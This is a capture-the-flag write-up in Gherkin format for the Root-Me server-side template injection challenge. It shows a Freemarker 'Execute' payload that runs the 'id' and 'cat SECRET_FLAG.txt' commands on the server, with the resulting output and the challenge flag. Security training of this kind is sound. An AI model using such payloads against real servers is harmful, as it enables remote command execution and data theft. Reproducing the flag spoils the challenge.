## Version 2.0
## language: en

Feature: Web server-rootme
  Site:
    www.root-me.org
  Category:
    Web server
  User:
    dianaosorio97
  Goal:
    Find the validation password

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | kali-rolling    | 2019.1      |
    | Mozilla Firefox | 64.4.0      |
  Machine information:
    Given I am accessing the following link
    """
    https://www.root-me.org/en/Challenges/Web-Server/
    Server-side-Template-Injection
    """
    And I see the problem statement
    """
    Exploit the vulnerability in order to retrieve
    the validation password in the file SECRET_FLAG.txt.
    """
    Then I selected the challenge button to start
    And The page redirects me to the following link
    """
    http://challenge01.root-me.org/web-serveur/ch49/
    """
    Then I see a form to search user
    """
    Do I know you? Please send me your nickname:
    """
    And I send the admin name
    And I see the following output
    """
    It's seems that I know you :) admin
    """
  Scenario: Sucess: Using command exec(cat)
    Given I am logged in the machine
    And I insert a payload to know if the application is vuln to SSTI
    """
    ${7*7}
    """
    Then I get the following output
    """
    It's seems that I know you :) 49
    """
    And I identify the templete language use
    """
    <#assign ex="freemarker.template.utility.Execute"?new()>
    ${ ex("id") }
    """
    Then I get a output with the request data
    """
    It's seems that I know you :) uid=1109(web-serveur-ch41)
    gid=1109(web-serveur-ch41) groupes=1109(web-serveur-ch41)
    ,100(users)
    """
    And I know the template language is freemarker
    And I insert the command cat in the method exec
    """
    <#assign ex = "freemarker.template.utility.Execute"?new()>
    ${ ex(" cat SECRET_FLAG.txt")}
    """
    Then I get the flag
    """
    It's seems that I know you :) B3wareOfT3mplat3Inj3ction
    """
    And I put the code in the text field
    And I solve the challenge
